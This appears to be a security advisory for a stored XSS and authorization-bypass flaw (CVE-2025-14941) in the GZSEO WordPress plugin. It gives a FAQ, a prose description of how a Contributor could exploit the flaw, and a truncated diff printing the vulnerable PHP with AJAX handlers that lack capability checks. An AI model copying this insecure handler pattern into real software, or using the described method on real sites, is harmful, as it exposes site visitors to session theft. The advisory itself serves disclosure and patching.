What is CVE-2025-14941?

CVE-2025-14941 is a medium-severity vulnerability in the GZSEO plugin for WordPress, allowing authenticated users with Contributor-level access or higher to bypass authorization checks and perform stored cross-site scripting (XSS) attacks.

How does the vulnerability work?

The vulnerability arises from missing capability checks on AJAX handlers combined with insufficient input sanitization on the embed_code parameter. This allows attackers to inject malicious scripts into posts, which execute when other users view the affected pages.

Who is affected by this vulnerability?

Any WordPress site using GZSEO version 2.0.11 or earlier is affected. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

Check the version of the GZSEO plugin installed on your WordPress site. If it is version 2.0.11 or earlier, your site is vulnerable to CVE-2025-14941.

How can I fix this vulnerability?

To mitigate this vulnerability, update the GZSEO plugin to version 2.0.12 or later, where the vulnerability has been patched by implementing proper capability checks and improving input sanitization.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while exploitation requires authentication, the impact of successful exploitation can be significant, including potential data theft or site defacement.

What are the potential consequences of this vulnerability?

Successful exploitation can lead to stored XSS, allowing attackers to execute arbitrary JavaScript in the context of other users. This can result in session hijacking, account takeovers, or unauthorized actions performed on behalf of victims.

How does the proof of concept demonstrate the issue?

The proof of concept outlines a method for an authenticated attacker to exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint, injecting malicious code into the embed_code parameter, which is then executed when the post is viewed.

What are AJAX handlers in this context?

AJAX handlers are server-side functions that process asynchronous requests in WordPress. In this case, the GZSEO plugin’s AJAX handlers lack proper capability checks, allowing unauthorized actions to be performed by authenticated users.

Is there a way to mitigate the risk if I cannot update immediately?

If immediate updates are not possible, consider restricting access to the GZSEO plugin’s settings to only trusted users, and monitor user activity for any suspicious behavior until the plugin can be updated.

What should I do if I suspect my site has been compromised?

If you suspect exploitation, immediately review your site’s content for unauthorized changes, change passwords for all user accounts, and consider restoring from a clean backup. Additionally, update the GZSEO plugin as soon as possible.

Where can I find more information on this vulnerability?

Detailed information about CVE-2025-14941 can be found in the official CVE database, security advisories from WordPress, and the plugin’s changelog, which outlines the changes made in the patched version.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14941: GZSEO <= 2.0.11 – Authenticated (Contributor+) Authorization Bypass to Stored Cross-Site Scripting (gzseo)

CVE ID CVE-2025-14941

Plugin gzseo

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.0.11

Patched Version 2.0.12

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14941:
This vulnerability is an authenticated authorization bypass leading to stored cross-site scripting (XSS) in the GZSEO WordPress plugin. The flaw allows users with Contributor-level permissions or higher to inject arbitrary web scripts into any post on the site. These scripts execute when a victim accesses the compromised page. The vulnerability stems from missing capability checks on multiple AJAX handlers combined with insufficient input sanitization and output escaping.

Atomic Edge research identifies the root cause in the plugin’s AJAX handlers within the file `gzseo/gzseo.php`. The plugin registers several AJAX actions, such as `gzseo_save_settings`, `gzseo_refresh_dashboard`, `gzseo_auth_google`, and `gzseo_disconnect_google`, using `add_action(‘wp_ajax_…’)`. These handlers, including `save_settings()`, `refresh_dashboard()`, `auth_google()`, and `disconnect_google()`, perform a nonce check via `check_ajax_referer(‘gzseo_nonce’, ‘nonce’)` but lack any WordPress capability check (e.g., `current_user_can()`). This omission allows any authenticated user, regardless of their role, to trigger these administrative functions. The `embed_code` parameter, used in features like the table generator, receives insufficient sanitization before being stored and later output without proper escaping.

The exploitation method involves an authenticated attacker with at least Contributor access crafting a malicious AJAX request. The attacker targets the `/wp-admin/admin-ajax.php` endpoint with the `action` parameter set to a vulnerable handler like `gzseo_save_settings`. The request must include a valid nonce, which Contributor-level users can obtain from plugin admin pages. The attacker injects a malicious payload into parameters like `embed_code`. This payload is then stored in the post metadata. When a visitor loads the affected post, the unsanitized `embed_code` is echoed directly into the page, executing the attacker’s JavaScript in the victim’s browser context.

The patch addresses the vulnerability by implementing proper capability checks on all affected AJAX handlers. The code diff shows the addition of `if (!current_user_can(‘manage_options’)) { wp_die(); }` at the beginning of each vulnerable function, including `save_settings()`, `refresh_dashboard()`, `auth_google()`, and `disconnect_google()`. This change restricts access to users with the `manage_options` capability, typically only Administrators. The patch also improves input validation and output escaping for the `embed_code` and other user-controlled parameters, ensuring they are sanitized before storage and escaped before rendering.

Successful exploitation leads to stored cross-site scripting. An attacker can inject malicious JavaScript, which executes in the context of any user viewing the compromised post. This can result in session hijacking, account takeover, defacement, or redirection to malicious sites. The attacker could also perform actions on behalf of the victim, such as changing passwords or creating new administrator accounts, if the victim has higher privileges. The CVSS score of 6.4 reflects the medium attack complexity due to the required authentication and nonce, combined with the high impact of arbitrary script execution.

Differential between vulnerable and patched code

Code Diff

--- a/gzseo/gzseo.php
+++ b/gzseo/gzseo.php
@@ -1,1251 +1,1463 @@
-<?php
-/**
- * Plugin Name: GZSEO
- * Description: Generation Z SEO Plugin | Website SEO Powered by Artificial Intelligence
- * Author: Amin Hashemi
- * Version: 2.0.11
- * Author URI: https://aminhashemy.org/
- * License: GPLv2
- * License URI: https://www.gnu.org/licenses/gpl-2.0.html
- */
-
-// جلوگیری از دسترسی مستقیم
-if (!defined('ABSPATH')) {
-    exit;
-}
-
-// تعریف ثابت‌ها
-define('GZSEO_VERSION', '2.0.11');
-define('GZSEO_PLUGIN_URL', plugin_dir_url(__FILE__));
-define('GZSEO_PLUGIN_PATH', plugin_dir_path(__FILE__));
-
-// کلاس اصلی افزونه
-class GZSeo
-{
-
-    private static $instance = null;
-
-    public static function get_instance()
-    {
-        if (null === self::$instance) {
-            self::$instance = new self();
-        }
-        return self::$instance;
-    }
-
-    private function __construct()
-    {
-        add_action('init', array($this, 'load_textdomain'));
-
-        $this->init_hooks();
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/ajax-handlers.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-featured-image-ai.php';
-
-        // Load Comment Generator AI module
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-comment-generator-ai.php';
-
-        // Load Search Console module
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-search-console.php';
-        new GZSEO_Search_Console();
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-ai-api.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-search-keywords.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-table-generator.php';
-        //$this->table_generator = new GZSEO_Table_Generator();
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-title-description-generator.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-video-update.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-content-update.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-table-styles.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-person-schema.php';
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-product-list-schema.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/class-gzseo-featured-image-settings.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-migration-manager.php';
-
-        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-ai-migration.php';
-        require_once GZSEO_PLUGIN_PATH . 'includes/migrations/class-gzseo-search-console-migration.php';
-    }
-
-    private function init_hooks()
-    {
-        add_action('admin_menu', array($this, 'add_admin_menu'));
-        add_action('admin_enqueue_scripts', array($this, 'enqueue_admin_assets'));
-        add_action('wp_ajax_gzseo_save_settings', array($this, 'save_settings'));
-        add_action('wp_ajax_gzseo_refresh_dashboard', array($this, 'refresh_dashboard'));
-        add_action('wp_ajax_gzseo_auth_google', array($this, 'auth_google'));
-        add_action('wp_ajax_gzseo_disconnect_google', array($this, 'disconnect_google'));
-        add_action('wp_ajax_gzseo_save_bulk_update', array($this, 'save_bulk_update'));
-        add_action('wp_ajax_gzseo_save_config', array($this, 'save_config'));
-        // اضافه کردن متاباکس به صفحات ادمین
-        add_action('add_meta_boxes', array($this, 'add_gzseo_metabox'));
-
-        // اضافه کردن متاباکس به دسته‌بندی‌ها
-        add_action('category_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
-        add_action('post_tag_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
-        add_action('product_cat_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
-        add_action('product_tag_edit_form_fields', array($this, 'render_taxonomy_fields_limited'), 10, 2);
-
-        add_action('save_post', array($this, 'save_gzseo_metabox'));
-
-        add_action('wp_ajax_gzseo_get_taxonomy_terms', array($this, 'get_taxonomy_terms'));
-
-        add_action('wp_ajax_gzseo_bulk_preview', array($this, 'bulk_preview'));
-        add_action('wp_ajax_gzseo_bulk_execute', array($this, 'bulk_execute'));
-
-        add_action('wp_ajax_gzseo_update_ai_credits', array($this, 'ajax_update_ai_credits'));
-
-        add_action('init', array($this, 'check_and_run_migration'), 5);
-
-        add_action('http_api_curl', function($handle, $r, $url){
-            // اگر پلاگینی قبلا مقدار timeout رو تغییر داده، اینجا مقدارش اصلاح میشه
-            curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 10);
-            curl_setopt($handle, CURLOPT_TIMEOUT, 300);
-        }, 10, 3);
-    }
-
-    public function save_gzseo_metabox()
-    {
-
-    }
-
-    // متد بررسی اتصال
-    public function is_ai_connected()
-    {
-        return get_option('gzseo_ai_logged_in', false);
-    }
-
-    // متد دریافت ایمیل
-    public function get_ai_email()
-    {
-        return get_option('gzseo_ai_email', '');
-    }
-
-    // متد دریافت اعتبار
-    public function get_ai_credits()
-    {
-        $credits = get_option('gzseo_ai_credits', 0);
-        return number_format($credits);
-    }
-
-    /*public function load_textdomain()
-    {
-        load_plugin_textdomain('gzseo', false, dirname(plugin_basename(__FILE__)) . '/languages');
-    }*/
-    public function load_textdomain()
-    {
-        $domain = 'gzseo';
-        $locale = get_locale(); // همیشه en_US خواهد بود
-
-        // ساخت مسیر کامل و دقیق فایل .mo
-        $mofile = plugin_dir_path(__FILE__) . 'languages/' . $domain . '-' . $locale . '.mo';
-
-        // دیباگ: نمایش اطلاعات
-        if (defined('WP_DEBUG') && WP_DEBUG) {
-            error_log("GZSEO Debug: Attempting to load MO file directly from: " . $mofile);
-            error_log("GZSEO Debug: File exists before load: " . (file_exists($mofile) ? 'Yes' : 'No'));
-        }
-
-        // بارگذاری مستقیم فایل .mo
-        load_textdomain($domain, $mofile);
-
-        // دیباگ: بررسی نهایی
-        if (defined('WP_DEBUG') && WP_DEBUG) {
-            error_log("GZSEO Debug: Textdomain loaded after direct load: " . (is_textdomain_loaded($domain) ? 'Yes' : 'No'));
-        }
-    }
-
-    public function add_admin_menu()
-    {
-        // منوی اصلی
-        add_menu_page(
-            __('جی زد سئو', 'gzseo'),
-            __('جی زد سئو', 'gzseo'),
-            'manage_options',
-            'gzseo-dashboard',
-            array($this, 'render_dashboard'),
-            'dashicons-chart-line',
-            30
-        );
-
-        // زیرمنوی داشبورد
-        add_submenu_page(
-            'gzseo-dashboard',
-            __('داشبورد', 'gzseo'),
-            __('داشبورد', 'gzseo'),
-            'manage_options',
-            'gzseo-dashboard',
-            array($this, 'render_dashboard')
-        );
-
-        // زیرمنوی آپدیت دسته جمعی
-        add_submenu_page(
-            'gzseo-dashboard',
-            __('آپدیت دسته جمعی', 'gzseo'),
-            __('آپدیت دسته جمعی', 'gzseo'),
-            'manage_options',
-            'gzseo-bulk-update',
-            array($this, 'render_bulk_update_page')
-        );
-
-        // زیرمنوی گزارشات
-        add_submenu_page(
-            'gzseo-dashboard',
-            __('گزارشات', 'gzseo'),
-            __('گزارشات', 'gzseo'),
-            'manage_options',
-            'gzseo-reports',
-            array($this, 'render_reports_page')
-        );
-    }
-
-    public function enqueue_admin_assets($hook)
-    {
-        // صفحات افزونه
-        $gzseo_pages = array(
-            'toplevel_page_gzseo-dashboard',
-            'جی-زد-سئو_page_gzseo-reports',
-            'جی-زد-سئو_page_gzseo-bulk-update'
-        );
-
-        // صفحات ویرایش پست‌ها
-        $edit_pages = array(
-            'post.php',
-            'post-new.php',
-            'term.php',
-            'edit-tags.php'
-        );
-        //echo $hook;die();
-
-        // بررسی صفحات افزونه یا صفحات ویرایش
-        if (!in_array(urldecode($hook), $gzseo_pages) && !in_array($hook, $edit_pages)) {
-            return;
-        }
-
-        // فقط برای صفحات ویرایش، بررسی نوع پست
-        if (in_array($hook, $edit_pages)) {
-            global $post_type, $taxnow;
-
-            // نوع‌های پست مجاز
-            $allowed_post_types = array('post', 'page', 'product');
-
-            // تکسونومی‌های مجاز
-            $allowed_taxonomies = array('category', 'post_tag', 'product_cat', 'product_tag');
-
-            // بررسی نوع پست
-            if (isset($post_type) && !in_array($post_type, $allowed_post_types)) {
-                return;
-            }
-
-            // بررسی تکسونومی برای صفحات ترم
-            if (($hook === 'term.php' || $hook === 'edit-tags.php') && isset($taxnow) && !in_array($taxnow, $allowed_taxonomies)) {
-                return;
-            }
-        }
-
-        // Select2 CSS
-        wp_enqueue_style(
-            'select2',
-            'https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css',
-            array(),
-            '4.1.0'
-        );
-
-        // Select2 JS
-        wp_enqueue_script(
-            'select2',
-            'https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js',
-            array('jquery'),
-            '4.1.0',
-            true
-        );
-
-        // Enqueue styles
-        wp_enqueue_style(
-            'gzseo-admin',
-            GZSEO_PLUGIN_URL . 'assets/admin.css',
-            array(),
-            GZSEO_VERSION
-        );
-
-        // Enqueue Font Awesome
-        wp_enqueue_style(
-            'gzseo-fontawesome',
-            'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css',
-            array(),
-            '6.4.0'
-        );
-
-        wp_enqueue_script(
-            'gzseo-admin',
-            GZSEO_PLUGIN_URL . 'assets/admin.js',
-            array('jquery','select2'),
-            time(), // فقط برای دیباگ
-            true
-        );
-
-        // Localize script
-        wp_localize_script('gzseo-admin', 'gzseo_ajax', array(
-            'ajax_url' => admin_url('admin-ajax.php'),
-            'nonce' => wp_create_nonce('gzseo_ajax_nonce'),
-            'current_page' => $hook,
-            'post_type' => isset($post_type) ? $post_type : '',
-            'post_id' => get_the_ID(),
-            'messages' => array(
-                'confirm_delete' => __('آیا مطمئن هستید؟', 'gzseo'),
-                'loading' => __('در حال بارگذاری...', 'gzseo'),
-                'error' => __('خطایی رخ داده است', 'gzseo'),
-                'success' => __('عملیات با موفقیت انجام شد', 'gzseo')
-            )
-        ));
-
-        // Enqueue specific script for bulk update page
-        wp_enqueue_script(
-            'gzseo-bulk-update-page',
-            GZSEO_PLUGIN_URL . 'assets/js/bulk-update-page.js',
-            array('jquery'),
-            GZSEO_VERSION,
-            true
-        );
-
-        // Enqueue featured image settings script
-        wp_enqueue_script(
-            'gzseo-featured-image-settings',
-            GZSEO_PLUGIN_URL . 'assets/js/featured-image-settings.js',
-            array('jquery'),
-            GZSEO_VERSION,
-            true
-        );
-
-    }
-
-    public function render_dashboard()
-    {
-        require_once GZSEO_PLUGIN_PATH . 'includes/admin-dashboard.php';
-    }
-
-    public function render_bulk_update_page()
-    {
-        require_once GZSEO_PLUGIN_PATH . 'includes/admin-bulk-update.php';
-    }
-
-    public function render_reports_page()
-    {
-        require_once GZSEO_PLUGIN_PATH . 'includes/admin-reports.php';
-    }
-
-    public function add_gzseo_metabox()
-    {
-        $post_types = array('post', 'page', 'product');
-
-        foreach ($post_types as $post_type) {
-            add_meta_box(
-                'gzseo_metabox',
-                __('امکانات افزونه جی زد سئو', 'gzseo'),
-                array($this, 'render_gzseo_metabox'),
-                $post_type,
-                'normal',
-                'high'
-            );
-        }
-
-
-    }
-
-    public function render_gzseo_metabox($post)
-    {
-        wp_nonce_field('gzseo_metabox_nonce', 'gzseo_metabox_nonce');
-        $this->render_gzseo_fields();
-    }
-
-    public function render_taxonomy_fields($term)
-    {
-        ?>
-        <tr class="form-field">
-            <td colspan="2">
-                <?php $this->render_gzseo_fields(); ?>
-            </td>
-        </tr>
-        <?php
-    }
-
-    public function render_taxonomy_fields_limited($term)
-    {
-        ?>
-        <tr class="form-field">
-            <td colspan="2">
-                <?php $this->render_gzseo_fields_limited(); ?>
-            </td>
-        </tr>
-        <?php
-    }
-
-    private function render_gzseo_fields()
-    {
-        $ai_credits = get_option('gzseo_ai_credits', 0);
-        global $post;
-        ?>
-        <div class="gzseo-metabox-wrapper">
-            <div class="gzseo-metabox-header">
-                <div class="gzseo-metabox-title"><?php _e('امکانات افزونه جی زد سئو', 'gzseo'); ?></div>
-                <div class="gzseo-metabox-credits">
-                    <i class="fas fa-coins"></i>
-                    <?php _e('اعتبار شما:', 'gzseo'); ?> <span class="gzseo-credits-amount"><?php echo number_format($ai_credits); ?></span> <?php _e('توکن', 'gzseo'); ?>
-                </div>
-            </div>
-
-            <div class="gzseo-metabox-tabs">
-                <button type="button" class="gzseo-metabox-tab active" data-tab="content-update"><?php _e('آپدیت محتوایی', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="video-update"><?php _e('آپدیت ویدیویی', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="featured-image"><?php _e('تصویر شاخص', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="title-desc"><?php _e('عنوان و توضیحات پست', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="generate-comment"><?php _e('تولید کامنت', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="generate-table"><?php _e('تولید جدول', 'gzseo'); ?></button>
-            </div>
-
-            <div class="gzseo-metabox-content">
-                <!-- تب آپدیت محتوایی -->
-                <div class="gzseo-metabox-panel active" id="gzseo-content-update">
-                    <?php
-                    if (class_exists('GZSEO_Content_Update')) {
-                        $content_update = new GZSEO_Content_Update();
-                        $content_update->render_content($post);
-                    } else {
-                        echo '<p>' . __('ماژول آپدیت محتوایی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب آپدیت ویدیویی -->
-                <div class="gzseo-metabox-panel" id="gzseo-video-update">
-                    <?php
-                    if (class_exists('GZSEO_Video_Update')) {
-                        $video_update = new GZSEO_Video_Update();
-                        $video_update->render_content($post);
-                    } else {
-                        echo '<p>' . __('ماژول آپدیت ویدیویی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب تصویر شاخص -->
-                <div class="gzseo-metabox-panel" id="gzseo-featured-image">
-                    <?php
-                    if (class_exists('GZSEO_Featured_Image_AI')) {
-                        $featured_image_ai = new GZSEO_Featured_Image_AI();
-                        $featured_image_ai->render_content($post);
-                    } else {
-                        echo '<p>' . __('ماژول تولید تصویر با هوش مصنوعی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب عنوان و توضیحات -->
-                <div class="gzseo-metabox-panel" id="gzseo-title-desc">
-                    <?php
-                    if (class_exists('GZSEO_Title_Description_Generator')) {
-                        $title_desc_generator = new GZSEO_Title_Description_Generator();
-                        $title_desc_generator->render_content($post);
-                    } else {
-                        echo '<p>' . __('ماژول تولید عنوان و توضیحات با هوش مصنوعی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب تولید کامنت -->
-                <div class="gzseo-metabox-panel" id="gzseo-generate-comment">
-                    <?php
-                    if (class_exists('GZSEO_Comment_Generator_AI')) {
-                        $comment_generator_ai = new GZSEO_Comment_Generator_AI();
-                        $comment_generator_ai->render_content($post);
-                    } else {
-                        echo '<p>' . __('ماژول تولید کامنت با هوش مصنوعی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب تولید جدول -->
-                <div class="gzseo-metabox-panel" id="gzseo-generate-table">
-                    <?php
-                    if (class_exists('GZSEO_Table_Generator')) {
-                        $table_generator_ai = new GZSEO_Table_Generator();
-                        $table_generator_ai->render_content($post);
-                    } else {
-                        echo '<p>' . __('ماژول تولید جدول با هوش مصنوعی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-            </div>
-        </div>
-        <?php
-    }
-
-    private function render_gzseo_fields_limited()
-    {
-        $ai_credits = get_option('gzseo_ai_credits', 0);
-        global $tag; // برای taxonomy از $tag استفاده می‌کنیم
-        ?>
-        <div class="gzseo-metabox-wrapper">
-            <div class="gzseo-metabox-header">
-                <div class="gzseo-metabox-title"><?php _e('امکانات افزونه جی زد سئو', 'gzseo'); ?></div>
-                <div class="gzseo-metabox-credits">
-                    <i class="fas fa-coins"></i>
-                    <?php _e('اعتبار شما:', 'gzseo'); ?> <span class="gzseo-credits-amount"><?php echo number_format($ai_credits); ?></span> <?php _e('توکن', 'gzseo'); ?>
-                </div>
-            </div>
-
-            <div class="gzseo-metabox-tabs">
-                <button type="button" class="gzseo-metabox-tab active" data-tab="content-update"><?php _e('آپدیت محتوایی', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="video-update"><?php _e('آپدیت ویدیویی', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="title-desc"><?php _e('عنوان و توضیحات پست', 'gzseo'); ?></button>
-                <button type="button" class="gzseo-metabox-tab" data-tab="generate-table"><?php _e('تولید جدول', 'gzseo'); ?></button>
-            </div>
-
-            <div class="gzseo-metabox-content">
-                <!-- تب آپدیت محتوایی -->
-                <div class="gzseo-metabox-panel active" id="gzseo-content-update">
-                    <?php
-                    if (class_exists('GZSEO_Content_Update')) {
-                        $content_update = new GZSEO_Content_Update();
-                        $content_update->render_taxonomy_content($tag);
-                    } else {
-                        echo '<p>' . __('ماژول آپدیت محتوایی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب آپدیت ویدیویی -->
-                <div class="gzseo-metabox-panel" id="gzseo-video-update">
-                    <?php
-                    if (class_exists('GZSEO_Video_Update')) {
-                        $video_update = new GZSEO_Video_Update();
-                        $video_update->render_taxonomy_content($tag);
-                    } else {
-                        echo '<p>' . __('ماژول آپدیت ویدیویی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب عنوان و توضیحات -->
-                <div class="gzseo-metabox-panel" id="gzseo-title-desc">
-                    <?php
-                    if (class_exists('GZSEO_Title_Description_Generator')) {
-                        $title_desc_generator = new GZSEO_Title_Description_Generator();
-                        $title_desc_generator->render_taxonomy_content($tag);
-                    } else {
-                        echo '<p>' . __('ماژول تولید عنوان و توضیحات با هوش مصنوعی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-
-                <!-- تب تولید جدول -->
-                <div class="gzseo-metabox-panel" id="gzseo-generate-table">
-                    <?php
-                    if (class_exists('GZSEO_Table_Generator')) {
-                        $table_generator_ai = new GZSEO_Table_Generator();
-                        $table_generator_ai->render_taxonomy_content($tag);
-                    } else {
-                        echo '<p>' . __('ماژول تولید جدول با هوش مصنوعی یافت نشد.', 'gzseo') . '</p>';
-                    }
-                    ?>
-                </div>
-            </div>
-        </div>
-        <?php
-    }
-
-    // Helper methods
-    private function is_google_connected()
-    {
-        return get_option('gzseo_google_connected', false);
-    }
-
-    // AJAX handlers
-    public function save_settings()
-    {
-        check_ajax_referer('gzseo_nonce', 'nonce');
-
-        // Save settings logic here
-
-        wp_send_json_success(array('message' => __('تنظیمات با موفقیت ذخیره شد', 'gzseo')));
-    }
-
-    public function refresh_dashboard()
-    {
-        check_ajax_referer('gzseo_nonce', 'nonce');
-
-        // Refresh dashboard logic here
-
-        wp_send_json_success(array('message' => __('داشبورد بروزرسانی شد', 'gzseo')));
-    }
-
-    public function auth_google()
-    {
-        check_ajax_referer('gzseo_nonce', 'nonce');
-
-        // Google auth logic here
-
-        wp_send_json_success(array('redirect_url' => 'https://accounts.google.com/oauth/authorize'));
-    }
-
-    public function disconnect_google()
-    {
-        check_ajax_referer('gzseo_nonce', 'nonce');
-
-        update_option('gzseo_google_connected', false);
-
-        wp_send_json_success(array('message' => __('اتصال قطع شد', 'gzseo')));
-    }
-
-    public function save_bulk_update()
-    {
-
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'gzseo_ajax_nonce')) {
-            wp_send_json_error(array('message' => __('خطای امنیتی', 'gzseo')));
-            return;
-        }
-
-        $action = isset($_POST['bulk_action']) ? sanitize_text_field($_POST['bulk_action']) : 'add';
-
-        if ($action === 'delete') {
-            // حذف آیتم
-            $index = intval($_POST['index']);
-            $saved_items = get_option('gzseo_bulk_update_items', array());
-
-            if (isset($saved_items[$index])) {
-                unset($saved_items[$index]);
-                $saved_items = array_values($saved_items); // Re-index array
-                update_option('gzseo_bulk_update_items', $saved_items);
-                wp_send_json_success(array('message' => __('آیتم با موفقیت حذف شد', 'gzseo')));
-            } else {
-                wp_send_json_error(array('message' => __('آیتم یافت نشد', 'gzseo')));
-            }
-            return;
-        }
-
-        if ($action === 'update') {
-            // ویرایش آیتم
-            $index = intval($_POST['index']);
-            $saved_items = get_option('gzseo_bulk_update_items', array());
-
-            if (isset($saved_items[$index])) {
-                $saved_items[$index] = array(
-                    'post_type' => sanitize_text_field($_POST['post_type']),
-                    'last_update' => intval($_POST['last_update']),
-                    'update_type' => sanitize_text_field($_POST['update_type']),
-                    'taxonomy_type' => sanitize_text_field($_POST['taxonomy_type']),
-                    'selected_terms' => isset($_POST['selected_terms']) ? array_map('sanitize_text_field', $_POST['selected_terms']) : array()
-                );
-
-                update_option('gzseo_bulk_update_items', $saved_items);
-                wp_send_json_success(array('message' => __('آیتم با موفقیت بروزرسانی شد', 'gzseo')));
-            } else {
-                wp_send_json_error(array('message' => __('آیتم یافت نشد', 'gzseo')));
-            }
-            return;
-        }
-
-        // افزودن آیتم جدید
-        $new_item = array(
-            'post_type' => sanitize_text_field($_POST['post_type']),
-            'last_update' => intval($_POST['last_update']),
-            'update_type' => sanitize_text_field($_POST['update_type']),
-            'taxonomy_type' => sanitize_text_field($_POST['taxonomy_type']),
-            'selected_terms' => isset($_POST['selected_terms']) ? array_map('sanitize_text_field', $_POST['selected_terms']) : array()
-        );
-
-        $saved_items = get_option('gzseo_bulk_update_items', array());
-        $saved_items[] = $new_item;
-
-        update_option('gzseo_bulk_update_items', $saved_items);
-
-        wp_send_json_success(array('message' => __('آیتم جدید با موفقیت ذخیره شد', 'gzseo')));
-    }
-
-    public function get_taxonomy_terms()
-    {
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'gzseo_ajax_nonce')) {
-            wp_send_json_error(array('message' => __('خطای امنیتی', 'gzseo')));
-            return;
-        }
-
-        $taxonomy_type = sanitize_text_field($_POST['taxonomy_type']);
-        $post_type = sanitize_text_field($_POST['post_type']);
-
-        $terms_html = '';
-
-        if ($taxonomy_type === 'all') {
-            // دریافت تمام تکسونومی‌های مرتبط با post type
-            $taxonomies = get_object_taxonomies($post_type, 'objects');
-
-            foreach ($taxonomies as $taxonomy) {
-                if ($taxonomy->public && $taxonomy->show_ui) {
-                    $terms = get_terms(array(
-                        'taxonomy' => $taxonomy->name,
-                        'hide_empty' => false
-                    ));
-
-                    if (!is_wp_error($terms) && !empty($terms)) {
-                        $terms_html .= '<div class="gzseo-taxonomy-group">';
-                        $terms_html .= '<h4>' . esc_html($taxonomy->label) . '</h4>';
-
-                        foreach ($terms as $term) {
-                            $terms_html .= '<label>';
-                            $terms_html .= '<input type="checkbox" name="selected_terms[]" value="' . esc_attr($term->term_id) . '">';
-                            $terms_html .= ' ' . esc_html($term->name);
-                            $terms_html .= '</label>';
-                        }
-
-                        $terms_html .= '</div>';
-                    }
-                }
-            }
-        } else {
-            // دریافت ترم‌های یک تکسونومی خاص
-            $terms = get_terms(array(
-                'taxonomy' => $taxonomy_type,
-                'hide_empty' => false
-            ));
-
-            if (!is_wp_error($terms) && !empty($terms)) {
-                $terms_html .= '<div class="gzseo-taxonomy-group">';
-
-                foreach ($terms as $term) {
-                    $terms_html .= '<label>';
-                    $terms_html .= '<input type="checkbox" name="selected_terms[]" value="' . esc_attr($term->term_id) . '">';
-                    $terms_html .= ' ' . esc_html($term->name);
-                    $terms_html .= '</label>';
-                }
-
-                $terms_html .= '</div>';
-            }
-        }
-
-        if (empty($terms_html)) {
-            $terms_html = '<p>' . __('هیچ ترمی یافت نشد.', 'gzseo') . '</p>';
-        }
-
-        wp_send_json_success(array('html' => $terms_html));
-    }
-
-    public function bulk_preview()
-    {
-        if (!isset($_POST['nonce']) || !wp_verify_nonce($_POST['nonce'], 'gzseo_ajax_nonce')) {
-            wp_send_json_error(array('message' => __('خطای امنیتی', 'gzseo')));
-            return;
-        }
-
-        $index = intval($_POST['index']);
-        $count = intval($_POST['count']);
-
-        $saved_items = get_option('gzseo_bulk_update_items', array());
-
-        if (!isset($saved_items[$index])) {
-            wp_send_json_error(array('message' => __('آیتم یافت نشد', 'gzseo')));
-            return;
-        }
-
-        $item = $saved_items[$index];
-
-        // Query arguments
-        $args = array(
-            'post_type' => $item['post_type'],
-            'posts_per_page' => $count,
-            'post_status' => 'publish', // فقط پست‌های منتشر شده
-            'orderby' => 'modified',
-            'order' => 'ASC',
-            'date_query' => array(
-                array(
-                    'column' => 'post_modified',
-                    'before' => $item['last_update'] . ' days ago'
-                )
-            )
-        );
-
-        // Add taxonomy query if terms selected
-        if (!empty($item['selected_terms'])) {
-            $tax_query = array();
-            $terms_by_tax = array();
-
